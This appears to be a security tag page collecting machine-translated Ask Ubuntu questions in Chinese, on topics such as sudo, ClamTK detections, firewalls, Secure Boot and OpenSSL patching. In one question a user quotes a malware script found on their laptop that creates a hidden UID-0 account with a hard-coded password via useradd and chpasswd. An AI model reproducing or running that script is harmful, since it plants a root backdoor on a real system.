Tag: 安全
如何停止服务Sudo?
我想在实时启动会话期间无法发出任何根命令。 我不希望任何人能够以root用户身份登录。 期! 那么,是否有可能停止sudo服务? 如果是这样,这会完成我想要做的事情吗? 我尝试了下面三个可能的停止服务命令,但chkconfig –list show sudo仍在工作: (1) sudo stop sudo (2) sudo /etc/init.d/sudo stop (3) sudo service sudo stop
如何在我的笔记本电脑上处理恶意软件?
我相当肯定我的Ubuntu 13.10笔记本电脑感染了某种恶意软件。 每隔一段时间,我发现一个进程/ lib / sshd(由root拥有)运行并消耗大量的cpu。 它不是运行/ usr / sbin / sshd的sshd服务器。 二进制文件具有–wxrw-rwt权限,它在/ lib目录中生成并生成脚本。 最近的一个名为13959730401387633604,它执行以下操作 #!/bin/sh exec 1>/dev/null exec 2>/dev/null useradd -g 0 -u 0 -o gusr echo gusr:chaonimabi123456123 | chpasswd gusr用户是由恶意软件独立创建的,然后chpasswd在消耗100%cpu时挂起。 到目前为止,我已经确定gusr用户还被添加到/ etc /中的文件 /etc/group /etc/gshadow /etc/passwd /etc/shadow /etc/subgid /etc/subuid 似乎恶意软件使用“ – ”后缀制作了所有这些文件的副本。 可以在此处获取root修改的/ etc / files的完整列表。 此外,/ etc / hosts文件已更改为此 。 / lib […]
如何在Ubuntu中全局添加SSL客户端证书/密钥?
我有一个Web服务器,需要客户端证书才能建立SSL连接(在apache中SSLVerifyClient require )。 在firefox或chrome中,我只是在“你的证书”选项卡中导入包含我的PKCS 12格式证书的.p12文件,这样就可以了。 现在我想使用其他应用程序,这些应用程序没有自己提供客户端SSL证书的function(例如nautilus)。 我想必须有一个系统范围的位置,我可以存储我的客户端证书,但我在谷歌搜索时找到的唯一的东西是存储CA证书的位置。 所以我的问题是如何添加SSL客户端证书/密钥文件(我猜是.p12或.crt和.key)以便在系统范围内使用它们?
用ClamTK检测到病毒(可能感染?)
我用ClamTK对我的系统进行了例行扫描。 反病毒报告了3次检测。 三个检测的名称是: 1. [PUA.Phishing.Bank] 2. [PUA.Phishing.Bank] 3. [PUA.Script.Packed-1] 在Firefox缓存中检测到前两个: /.cache/mozilla/firefox/ 最后一个是在Chromium缓存中检测到的: /.cache/chromium/Default 我知道PUA代表可能不需要的软件。 这些误报是什么? 它是Windows病毒还是Linux病毒? 如果它是Linux病毒,它将如何影响我的系统?
家庭用户的预防性安全措施? (防火墙,防病毒等)
我刚刚从Windows切换到Ubuntu,在安全措施方面我只是有点偏执。 我环顾四周,从我所读过的内容来看,安全性并不像Windows操作系统那么重要,但我只是想确保我有点被覆盖。 目前,我已经安装了ClamTK防病毒和gufw(并启用了一次)。 基本上我有三个问题: 除了这些应用程序,定期更新,以及仅从受信任的来源下载,我应该采取任何其他预防措施吗? 我必须使用gufw做更多的事情而不是检查启用或默认设置(来电:拒绝,传出:允许)是否足够? 我是否必须每次手动打开gufw并启用它(并保持打开状态)? 每次打开它时,都会取消选中已启用的复选框。 编辑:当我打开gufw时,我必须解锁并输入我的密码,但现在选中了复选框。 我是否必须始终打开gufw我只需要启用一次吗? 谢谢。
如何确保Wine不会自动运行.exe文件?
我想仅为运行程序安装Wine,但我不想打开任何其他Windows文件(为了安全起见)。 是否可以确保Wine不会自动执行.exe文件? 谢谢。
是否在ubuntu 16.10上正确启用了安全启动?
我知道Ubuntu曾经提供安全启动支持,但仅用于兼容性。 Canonical在Ubuntu 15.10及更早版本中的安全启动实现主要是关于硬件支持,本页重点介绍如何针对常见的硬件支持配置测试安全启动,而不是启用安全启动来强化您的系统。 如果要将安全引导用作安全机制,则适当的解决方案是使用您自己的密钥(可选择注册其他密钥,请参见上文)并更新引导加载程序以禁止引导未签名的内核。 Ubuntu 16.04 LTS计划实现安全启动(详见LP:#1401532)。 我想知道Ubuntu 16.10是否仍然如此,因为文档没有更新。 此外,如果要使用旧的已签名引导加载程序替换grub引导加载程序,并且不执行已签名的内核映像等,那还不行吗? 它以某种方式被撤销了吗? 看到这个
Ubuntu的存储库中的Chromium是否可以安全使用,因为它已经过时了?
Ubuntu Chromium是否仍然可以安全使用,因为它已经过时了?
进行了哪些测试以确保回购中的包没有恶意软件?
如何确保受信任的用户无法使用恶意软件编译包并将其放入Universe存储库中。
如何修补OpenSSL中的漏洞?
我收到了生成我的证书的权威人员的警告,它说OpenSSL中存在错误,并且发现它影响版本1.0.1。 据我所知,我必须升级到1.0.1h来修复这个bug。 这是我第一次处理这些东西,我担心它会如何影响我的服务器。 我必须重新启动任何服务吗? 到底是什么? 我必须确保这不会花太长时间。
